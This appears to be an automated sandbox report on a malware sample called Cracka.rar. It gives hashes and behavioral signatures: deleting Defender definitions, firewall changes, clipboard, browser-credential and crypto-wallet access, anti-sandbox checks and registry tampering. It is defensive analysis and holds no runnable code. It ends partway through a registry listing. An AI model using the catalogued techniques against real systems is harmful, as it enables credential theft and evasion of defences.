Resubmissions
06/12/2024, 05:50
241206-gjl4rssra1 906/12/2024, 05:30
241206-f7e5payken 1006/12/2024, 05:14
241206-fw57qssjaz 806/12/2024, 05:10
241206-ft7b1s1rcx 806/12/2024, 04:51
241206-fg8djsxjek 1006/12/2024, 04:32
241206-e5x22szqet 906/12/2024, 04:28
241206-e3mhjazpb1 10Analysis
-
max time kernel
1048s -
max time network
1045s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
06/12/2024, 05:30
Static task
static1
Behavioral task
behavioral1
Sample
Cracka.rar
Resource
win10ltsc2021-20241023-en
General
-
Target
Cracka.rar
-
Size
18.1MB
-
MD5
681be9b88898fa0cdb6f9a8f41b248ec
-
SHA1
ce3153537fc5bbe19524d475922b1423fdacd109
-
SHA256
a21839b1f4ec7d9fa765bedf282699bdd84ed354eebfc6317bd09674b01894fb
-
SHA512
7c8f4fa515cd839b25694fb5f0593b2fbd905100626718b7a4e32958a9a85f6c48ebf7235108d65c57e379bfd5760b1ca976cf0048e079a366118166ec79574b
-
SSDEEP
393216:V6/rhud0xQt8EJzrF3+Evma7sJ170jVMTZE3fzYXwKpuGqQM0j:V6NudcQxxOEvq8VMcYgKpVL
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 6 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 3824 MpCmdRun.exe 5392 MpCmdRun.exe 1040 MpCmdRun.exe 4780 MpCmdRun.exe 1956 MpCmdRun.exe 3436 MpCmdRun.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3276 netsh.exe 4648 netsh.exe -
A potential corporate email address has been identified in the URL: [email protected]
-
A potential corporate email address has been identified in the URL: tweet-@x64dbg-1DA1F2
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Control Panel\International\Geo\Nation FiddlerSetup.exe Key value queried \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Control Panel\International\Geo\Nation Fiddler.exe Key value queried \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Control Panel\International\Geo\Nation Fiddler.exe -
Clipboard Data 1 TTPs 12 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 6620 powershell.exe 4440 cmd.exe 6288 powershell.exe 3640 cmd.exe 6916 powershell.exe 3948 cmd.exe 1828 powershell.exe 5536 powershell.exe 3564 cmd.exe 568 cmd.exe 4676 powershell.exe 1036 cmd.exe -
Executes dropped EXE 18 IoCs
pid Process 2244 FiddlerSetup.5.0.20245.10105-latest.exe 5648 FiddlerSetup.exe 700 SetupHelper 6920 Fiddler.exe 6344 TrustCert.exe 1012 pi5.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 6252 pi5.tmp.exe 4896 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 6972 pi5.tmp.exe 1740 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 6488 pi5.tmp.exe 6584 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 2776 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 6784 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 1012 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5796 Fiddler.exe 4200 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe -
Loads dropped DLL 64 IoCs
pid Process 5648 FiddlerSetup.exe 4040 mscorsvw.exe 4584 mscorsvw.exe 4584 mscorsvw.exe 6088 mscorsvw.exe 5000 mscorsvw.exe 5000 mscorsvw.exe 6128 mscorsvw.exe 6232 mscorsvw.exe 6400 mscorsvw.exe 6540 mscorsvw.exe 6540 mscorsvw.exe 6920 Fiddler.exe 6920 Fiddler.exe 6540 mscorsvw.exe 3408 mscorsvw.exe 4412 mscorsvw.exe 964 mscorsvw.exe 5392 mscorsvw.exe 6796 mscorsvw.exe 6928 mscorsvw.exe 5392 mscorsvw.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5184 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 5400 powershell.exe 6916 powershell.exe 6720 powershell.exe 4500 powershell.exe 4808 powershell.exe 3804 powershell.exe 5852 powershell.exe 4896 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 4896 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 4896 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 4896 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 4896 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 4896 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 4896 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 4896 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 4896 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 4896 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 4896 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 4896 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 4896 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 4896 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe 4896 0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe -
Modifies system executable filetype association 2 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\Debug with x64dbg\Command x96dbg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell x96dbg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\Debug with x64dbg x96dbg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\Debug with x64dbg\Command\ = "\"C:\\Users\\Admin\\Desktop\\release\\x96dbg.exe\" \"%1\"" x96dbg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\Debug with x64dbg\Icon = "\"C:\\Users\\Admin\\Desktop\\release\\x96dbg.exe\",0" x96dbg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\Debug with x64dbg\ = "Debug with x64dbg" x96dbg.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 5400 powershell.exe 524 powershell.exe 3716 powershell.exe 2972 powershell.exe 3476 powershell.exe 992 powershell.exe 3432 powershell.exe 3804 powershell.exe 4648 powershell.exe 6208 powershell.exe 2528 powershell.exe 4500 powershell.exe 5724 powershell.exe 5092 powershell.exe 6204 powershell.exe 5768 powershell.exe 2044 powershell.exe 2680 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 16 IoCs
flow ioc 929 raw.githubusercontent.com 924 raw.githubusercontent.com 928 raw.githubusercontent.com 919 camo.githubusercontent.com 920 camo.githubusercontent.com 922 camo.githubusercontent.com 925 raw.githubusercontent.com 943 camo.githubusercontent.com 945 camo.githubusercontent.com 917 camo.githubusercontent.com 918 camo.githubusercontent.com 675 camo.githubusercontent.com 927 raw.githubusercontent.com 926 raw.githubusercontent.com 921 camo.githubusercontent.com 923 camo.githubusercontent.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 592 ip-api.com 604 ip-api.com 974 ip-api.com 1542 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 18 IoCs
pid Process 7124 tasklist.exe 6764 tasklist.exe 6676 tasklist.exe 5392 tasklist.exe 4372 tasklist.exe 5492 tasklist.exe 3828 tasklist.exe 3804 tasklist.exe 6004 tasklist.exe 3220 tasklist.exe 6380 tasklist.exe 4960 tasklist.exe 5248 tasklist.exe 7132 tasklist.exe 1620 tasklist.exe 1964 tasklist.exe 2876 tasklist.exe 5884 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 1012 pi5.tmp.exe 1012 pi5.tmp.exe 6252 pi5.tmp.exe 6252 pi5.tmp.exe 6972 pi5.tmp.exe 6972 pi5.tmp.exe 6488 pi5.tmp.exe 6488 pi5.tmp.exe -
Drops file in Windows directory 41 IoCs
description ioc Process File opened for modification C:\Windows\assembly\temp\13XKZW790H\System.Runtime.Serialization.Formatters.Soap.ni.dll.aux mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt9064068c#\ab300698ff0e6328a779058c8a6abc9a\System.Runtime.Serialization.Formatters.Soap.ni.dll.aux.tmp mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Deployment\88b596885c6a2aecfe43892d03c5ba6b\System.Deployment.ni.dll.aux.tmp mscorsvw.exe File opened for modification C:\Windows\assembly\temp\B5W7W7TFUL\System.Numerics.ni.dll.aux mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1510-0\System.Deployment.dll mscorsvw.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File opened for modification C:\Windows\assembly\temp\EKLK2FA26M\System.Deployment.ni.dll.aux mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\d50-0\EnableLoopback.exe mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Security\42c7a19a453afb14fda2fe8479e4d8b2\System.Security.ni.dll.aux.tmp mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\0c073f42cf7c0b89bd4ceb4244060ceb\System.Numerics.ni.dll.aux.tmp mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data.SqlXml\6c172340af3f46e7e45d3cea5ee80a56\System.Data.SqlXml.ni.dll.aux.tmp mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.JScript\180d439c36f3cf6ec5649e1360f67487\Microsoft.JScript.ni.dll.aux.tmp mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\198c-0\System.Web.dll mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\EnableLoopback\a8e9750dcec3b7be6005a908fe2c2d8f\EnableLoopback.ni.exe.aux.tmp mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\113c-0\System.Security.dll mscorsvw.exe File opened for modification C:\Windows\CbsTemp TiWorker.exe File opened for modification C:\Windows\assembly\temp\SXBW39AQRI\System.Data.SqlXml.ni.dll.aux mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\3c4-0\System.Numerics.dll mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\0c073f42cf7c0b89bd4ceb4244060ceb\System.Numerics.ni.dll.aux.tmp mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1388-0\System.Deployment.dll mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Web\debe458f6197408829bf76c18c262527\System.Web.ni.dll.aux.tmp mscorsvw.exe File opened for modification C:\Windows\assembly\temp\JOBPGF12JF\Microsoft.JScript.ni.dll mscorsvw.exe File opened for modification C:\Windows\assembly\temp\B5W7W7TFUL\System.Numerics.ni.dll mscorsvw.exe File opened for modification C:\Windows\assembly\temp\SXBW39AQRI\System.Data.SqlXml.ni.dll mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data.SqlXml\6c172340af3f46e7e45d3cea5ee80a56\System.Data.SqlXml.ni.dll.aux.tmp mscorsvw.exe File opened for modification C:\Windows\CbsTemp TiWorker.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\fc8-0\System.Data.SqlXml.dll mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11e8-0\System.Security.dll mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt9064068c#\ab300698ff0e6328a779058c8a6abc9a\System.Runtime.Serialization.Formatters.Soap.ni.dll.aux.tmp mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1900-0\Microsoft.JScript.dll mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1b10-0\System.Runtime.Serialization.Formatters.Soap.dll mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Security\42c7a19a453afb14fda2fe8479e4d8b2\System.Security.ni.dll.aux.tmp mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1858-0\System.Runtime.Serialization.Formatters.Soap.dll mscorsvw.exe File opened for modification C:\Windows\assembly\temp\EKLK2FA26M\System.Deployment.ni.dll mscorsvw.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\17c8-0\System.Numerics.dll mscorsvw.exe File opened for modification C:\Windows\assembly\temp\13XKZW790H\System.Runtime.Serialization.Formatters.Soap.ni.dll mscorsvw.exe File opened for modification C:\Windows\assembly\temp\IW5FF2IDY4\System.Security.ni.dll mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1a8c-0\System.Data.SqlXml.dll mscorsvw.exe File created C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Deployment\88b596885c6a2aecfe43892d03c5ba6b\System.Deployment.ni.dll.aux.tmp mscorsvw.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe -
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 2 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
description ioc Process File created C:\Users\Admin\Downloads\FiddlerSetup.5.0.20245.10105-latest.exe:Zone.Identifier firefox.exe File created C:\Users\Admin\Downloads\pi5.tmp.exe:Zone.Identifier firefox.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FiddlerSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SetupHelper Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x96dbg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FiddlerSetup.5.0.20245.10105-latest.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TrustCert.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x96dbg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x96dbg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x96dbg.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 40 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Detects videocard installed 1 TTPs 6 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5888 WMIC.exe 6048 WMIC.exe 6624 WMIC.exe 1468 WMIC.exe 1424 WMIC.exe 2924 WMIC.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers system information 1 TTPs 6 IoCs
Runs systeminfo.exe.
pid Process 5168 systeminfo.exe 6676 systeminfo.exe 2732 systeminfo.exe 1568 systeminfo.exe 1832 systeminfo.exe 6652 systeminfo.exe -
Kills process with taskkill 1 IoCs
pid Process 3272 taskkill.exe -
Modifies Internet Explorer Phishing Filter 1 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Software\Microsoft\Internet Explorer\PhishingFilter rundll32.exe -
Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "0" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "0" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "0" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "0" rundll32.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\CaretBrowsing rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\Control Panel rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Software\Microsoft\Internet Explorer\GPU rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Software\Microsoft\Internet Explorer\Geolocation rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Fiddler.exe = "0" FiddlerSetup.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\IEDevTools rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\Settings rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\VersionHigh = "0" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\Geolocation\BlockAllWebsites = "0" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Software\Microsoft\Internet Explorer\Main rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\FlipAhead rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\Download rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\Revision = "0" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Software\Microsoft\Internet Explorer\New Windows rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Software\Microsoft\Internet Explorer\Safety\PrivacIE rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\Zoom rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\PrefetchPrerender rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\DeviceId = "0" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\VersionLow = "0" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\Wow64-DeviceId = "0" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\Safety\PrivacIE\DisableToolbars = "0" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION FiddlerSetup.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Software\Microsoft\Internet Explorer\Recovery rundll32.exe Key created \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\VendorId = "0" rundll32.exe Set value (int) 